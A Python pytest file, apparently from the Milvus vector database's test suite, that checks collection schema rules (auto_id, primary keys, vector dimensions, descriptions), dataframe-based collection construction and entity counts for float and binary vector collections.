@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
        method: specify auto_id=True for multiple int64 fields
        expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
        method: invalid dims -1, 0 and 32769
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
        expected: create collection successfully and verify the long description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
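# --- Illustrative sketch (not part of the original suite) ---
# The primary-key / auto_id behaviours exercised by the tests above, written
# directly against the pymilvus ORM classes. Field names ("id", "vec") and the
# dimension are placeholder values; the primary_field keyword and the
# schema.primary_field / schema.auto_id attributes are the same ones the tests
# above rely on.
def _sketch_primary_key_and_auto_id():
    from pymilvus import CollectionSchema, FieldSchema, DataType

    # A primary key can be declared on the field itself ...
    pk = FieldSchema(name="id", dtype=DataType.INT64, is_primary=True, auto_id=True)
    vec = FieldSchema(name="vec", dtype=DataType.FLOAT_VECTOR, dim=8)
    schema_a = CollectionSchema(fields=[pk, vec])
    # ... or named at schema level; both forms designate the same primary field.
    pk_plain = FieldSchema(name="id", dtype=DataType.INT64)
    schema_b = CollectionSchema(fields=[pk_plain, vec], primary_field="id")
    assert schema_a.primary_field.name == schema_b.primary_field.name == "id"
    # auto_id declared on the primary field propagates to the schema.
    assert schema_a.auto_id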
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_create_drop(self):
"""
        target: test cyclic creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
        method: 1. create two collection objects with the same name
                2. drop the collection through one of the objects
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
        method: 1. create a 2. drop a 3. re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
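# --- Illustrative sketch (not part of the original suite) ---
# The create / has_collection / drop lifecycle that TestCollectionOperation
# covers, written against the plain pymilvus ORM. It assumes a reachable
# Milvus server; the alias, host, port and collection name are placeholders.
def _sketch_collection_lifecycle():
    from pymilvus import connections, utility, Collection, CollectionSchema, FieldSchema, DataType

    connections.connect(alias="default", host="127.0.0.1", port="19530")
    schema = CollectionSchema(fields=[
        FieldSchema(name="id", dtype=DataType.INT64, is_primary=True),
        FieldSchema(name="vec", dtype=DataType.FLOAT_VECTOR, dim=8),
    ])
    coll = Collection(name="lifecycle_demo", schema=schema)
    assert utility.has_collection("lifecycle_demo")
    coll.drop()
    assert not utility.has_collection("lifecycle_demo")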
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_none_dataframe(self):
"""
        target: test create collection with a None dataframe
        method: pass None as the dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_only_column(self):
"""
        target: test collection from a dataframe with only columns
        method: dataframe has column definitions but no rows
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_inconsistent_dataframe(self):
"""
        target: test collection with inconsistent data
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
        method: pass a non-dataframe object when constructing the collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_data_type_dataframe(self):
"""
        target: test collection with an unsupported dataframe dtype
        method: create from a dataframe containing a datetime column
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
        method: create from a dataframe whose column name is an invalid field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_not_existed_primary_field(self):
"""
        target: test collection with a primary field that does not exist
        method: pass a primary_field name that is not in the dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_with_none_auto_id(self):
"""
        target: test construct with auto_id=None
        method: pass auto_id=None when constructing from dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
        method: auto_id=True and no ids inserted (primary field values are all None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
        expected: verify num entities and the auto-generated primary keys
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
        method: auto_id=False, primary field values are negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
        expected: both collection objects are correct and refer to the same data
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
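# --- Illustrative sketch (not part of the original suite) ---
# The dataframe construction path that TestCollectionDataframe covers, using
# Collection.construct_from_dataframe from the pymilvus ORM. Assumes a
# reachable Milvus server; the collection name, column names and sizes are
# placeholders, and the (collection, mutation_result) return shape mirrors how
# the tests above unpack the result.
def _sketch_construct_from_dataframe(nb=10):
    import numpy as np
    import pandas as pd
    from pymilvus import connections, Collection

    connections.connect(host="127.0.0.1", port="19530")
    df = pd.DataFrame({
        "int64": list(range(nb)),
        "float_vector": [np.random.random(8).tolist() for _ in range(nb)],
    })
    collection, mutation_result = Collection.construct_from_dataframe(
        "dataframe_demo", df, primary_field="int64", auto_id=False)
    # With auto_id=False the returned primary keys echo the dataframe values.
    assert mutation_result.primary_keys == df["int64"].values.tolist()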
class TestCollectionCount:
"""
    params are different nb values; a given nb may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
        method: create collection with no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
    params are different nb values; a given nb may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
        target: test count_entities, after index has been created
        method: add vectors in db and create index, then call count_entities with correct params
        expected: count equals the number of inserted entities
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
    params are different nb values; a given nb may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
        target: test count_entities, after index has been created
        method: add vectors in db and create index, then call count_entities with correct params
        expected: count equals the number of inserted entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
        method: create collection with no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
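# --- Illustrative sketch (not part of the original suite) ---
# A binary-vector schema of the kind the binary count tests above rely on,
# built with the plain pymilvus ORM. Names and the dimension are placeholders;
# note that a binary vector of dim d is packed into d / 8 raw bytes per entity.
def _sketch_binary_vector_schema():
    from pymilvus import CollectionSchema, FieldSchema, DataType

    schema = CollectionSchema(fields=[
        FieldSchema(name="id", dtype=DataType.INT64, is_primary=True),
        FieldSchema(name="bin_vec", dtype=DataType.BINARY_VECTOR, dim=128),
    ])
    # one entity's vector would be bytes(128 // 8) == 16 raw bytes
    assert schema.primary_field.name == "id"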
class TestCollectionMultiCollections:
"""
    params are different nb values; a given nb may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
